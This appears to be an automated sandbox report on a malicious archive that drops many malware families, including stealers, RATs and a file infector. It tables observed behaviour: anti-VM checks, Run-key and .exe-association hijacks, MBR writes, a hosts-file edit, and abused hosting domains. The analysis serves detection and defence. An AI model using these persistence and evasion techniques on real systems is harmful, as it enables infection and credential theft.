Malware Analysis Report

2025-01-23 11:53

Sample ID 241126-xpcehs1lck
Target Downloaders.zip
SHA256 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Tags: amadey ammyyadmin asyncrat babbleloader flawedammyy lumma neshta phorphiex quasar redline stealc xworm zharkbot default_valenciga fed3aa mars office04 bootkit botnet credential_access defense_evasion discovery evasion execution infostealer loader persistence pyinstaller rat spyware stealer themida trojan upx worm
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Threat Level: Known bad

The file Downloaders.zip was found to be: Known bad.

Malicious Activity Summary

AmmyyAdmin payload

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine payload

AsyncRat

Ammyy Admin

Redline family

Xworm family

Zharkbot family

Amadey

Detect Xworm Payload

Lumma Stealer, LummaC

Phorphiex payload

Quasar RAT

Xworm

Detects ZharkBot payload

Stealc

Quasar family

BabbleLoader

Neshta

Detect Neshta payload

Detects BabbleLoader Payload

Quasar payload

Asyncrat family

Ammyyadmin family

RedLine

Phorphiex, Phorpiex

FlawedAmmyy RAT

Phorphiex family

Lumma family

Flawedammyy family

ZharkBot

Neshta family

Amadey family

Stealc family

Babbleloader family

Async RAT payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Drops file in Drivers directory

Themida packer

Identifies Wine through registry keys

Checks computer location settings

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Drops startup file

Executes dropped EXE

Checks BIOS information in registry

Loads dropped DLL

Modifies system executable filetype association

Reads data files stored by FTP clients

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Writes to the Master Boot Record (MBR)

Indicator Removal: File Deletion

Adds Run key to start application

Enumerates processes with tasklist

Suspicious use of NtSetInformationThreadHideFromDebugger

UPX packed file

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Embeds OpenSSL

Program crash

System Location Discovery: System Language Discovery

Detects Pyinstaller

Unsigned PE

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Modifies registry key

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Detects videocard installed

Views/modifies file attributes

Runs ping.exe

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported: 2024-11-26 19:01

Signatures

Unsigned PE

Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 3

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-26 19:01
Reported: 2024-11-26 19:19
Platform: win10ltsc2021-20241023-en
Max time kernel: 165s
Max time network: 608s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 1

Ammyyadmin family

ammyyadmin

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

BabbleLoader

loader babbleloader

Babbleloader family

babbleloader

Detect Neshta payload

Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 50

Detect Xworm Payload

Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 5

Detects BabbleLoader Payload

Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 1

Detects ZharkBot payload

Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 1

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Neshta

persistence spyware neshta

Neshta family

neshta

Phorphiex family

phorphiex

Phorphiex payload

Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 1

Phorphiex, Phorpiex

worm trojan loader phorphiex

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 6

RedLine

infostealer redline

RedLine payload

Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 2

Redline family

redline

Stealc

stealer stealc

Stealc family

stealc

Xworm

trojan rat xworm

Xworm family

xworm

ZharkBot

botnet zharkbot

Zharkbot family

zharkbot

Async RAT payload

rat
Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 1

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description | Indicator | Process | Target | Count
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A | 1
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A | 1
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE | N/A | 1
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A | 1
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 9

Blocklisted process makes network request

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A | 1

Downloads MZ/PE file

Drops file in Drivers directory

Description | Indicator | Process | Target | Count
File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A | 1

Checks BIOS information in registry

Description | Indicator | Process | Target | Count
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 2
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 2
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 2
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 2
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 2
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE | N/A | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 4
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A | 1

Checks computer location settings

Description | Indicator | Process | Target | Count
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A | 1
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A | 7
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe | N/A | 1
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A | 10
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A | 3
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A | 1
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 2
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A | 6
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A | 1
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A | 8
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A | 1
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A | 6
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2946613613.exe | N/A | 1
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A | 7
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A | 1
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A | 2
Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1

Drops startup file

Description | Indicator | Process | Target | Count
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A | 1
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A | 1

Executes dropped EXE

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\client.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe | N/A | 1
N/A | N/A | C:\Windows\system32\SubDir\Client.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\winn.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\soft.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\m.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
N/A | N/A | C:\Windows\sysnldcvmr.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A | 3
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2946613613.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 3
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\248483651.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A | 1
N/A | N/A | C:\Windows\svchost.com | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 1

Identifies Wine through registry keys

evasion
Description | Indicator | Process | Target | Count
Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 3
Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A | 1
Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 7
Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE | N/A | 1
Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A | 2
Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A | 1

Loads dropped DLL

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A | 2
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE | N/A | 26
N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE | N/A | 2

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" C:\Users\Admin\AppData\Local\Temp\Files\m.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A 0.tcp.in.ngrok.io N/A N/A
N/A 0.tcp.in.ngrok.io N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\dsetup.dll C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\SETD746.tmp C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\DirectX\WebSetup C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\34B6AF881B9D738561FC099B83DF3A01 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File created C:\Windows\system32\SubDir\Client.exe C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\34B6AF881B9D738561FC099B83DF3A01 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File created C:\Windows\SysWOW64\directx\websetup\SETD736.tmp C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File created C:\Windows\SysWOW64\directx\websetup\SETD746.tmp C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\dsetup32.dll C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\SETD736.tmp C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe C:\Windows\svchost.com N/A
